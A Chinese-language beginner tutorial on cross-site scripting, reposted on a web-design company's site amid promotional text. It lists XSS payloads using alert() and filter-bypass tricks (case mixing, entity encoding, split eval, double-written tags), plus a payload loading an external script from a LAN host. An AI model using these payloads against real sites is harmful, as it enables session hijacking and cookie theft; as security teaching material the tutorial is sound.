XSS漏洞基礎(chǔ)知識有哪些，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

10年積累的成都網(wǎng)站設(shè)計、成都網(wǎng)站制作、外貿(mào)網(wǎng)站建設(shè)經(jīng)驗，可以快速應(yīng)對客戶對網(wǎng)站的新想法和需求。提供各種問題對應(yīng)的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認識你，你也不認識我。但先做網(wǎng)站設(shè)計后付款的網(wǎng)站建設(shè)流程，更有密云免費網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

一、XSS漏洞危害

1、盜取各種用戶賬號

2、竊取用戶cookie

3、劫持用戶會話

4、刷流量，執(zhí)行彈窗

二、漏洞驗證

1、在登錄框輸入下面代碼,點擊登錄

<script>alert(123)</script>

2、彈出對話框，說明存在xss漏洞

三、漏洞分類

1、反射型

只能利用一次，必須構(gòu)造特殊的連接讓目標點擊，比如上面的登錄界面。

2、存儲型

將特殊語句存儲到頁面，只要目標瀏覽該網(wǎng)頁，就會被攻擊，比如留言板。

3、DOM型

不與服務(wù)器進行交互，利用在本地渲染網(wǎng)頁時觸發(fā)

四、payload構(gòu)造

偽協(xié)議

<a href="javascript:alert(123)">aiyou</a>

事件

<img src="./1.jpg" onmouseover='alert(123)'><img src="#" onerror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">

五、繞過防護

1、大小寫繞過

<SCript>alert(123)</SCript>

2、引號的使用

<img src="#" onerror="alert(123)"/><img src='#' onerror='alert(123)'/><img src=# onerror=alert(123) />

3、“/”代替空格

<img/src='#'/Onerror='alert(123)'>

4、對標簽屬性值轉(zhuǎn)碼

字母    ASCII  十進制編碼  十六進制編碼

a        97         a        a

<a href="j&#97;v&#x61script:alert(123)">aiyou</a>

5、頭插入尾插入

<a href="&#01;j&#97;v&#x61script:alert(123)&#02;">aiyou</a>

6、拆分

<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>

7、雙寫繞過

<scrscriptipt>alert(123)</scscriptript>

六、外部調(diào)用

1、新建一個xss.js，內(nèi)容為

alert(213);

2、構(gòu)建paylaod,提交

<script src="http://192.168.1.129/js/xss.js"></script>

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識有進一步的了解或閱讀更多相關(guān)文章，請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對創(chuàng)新互聯(lián)的支持。

文章標題：XSS漏洞基礎(chǔ)知識有哪些
文章來源：http://sd-ha.com/article4/gpsdoe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供響應(yīng)式網(wǎng)站、自適應(yīng)網(wǎng)站、虛擬主機、定制開發(fā)、手機網(wǎng)站建設(shè)、網(wǎng)站制作

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)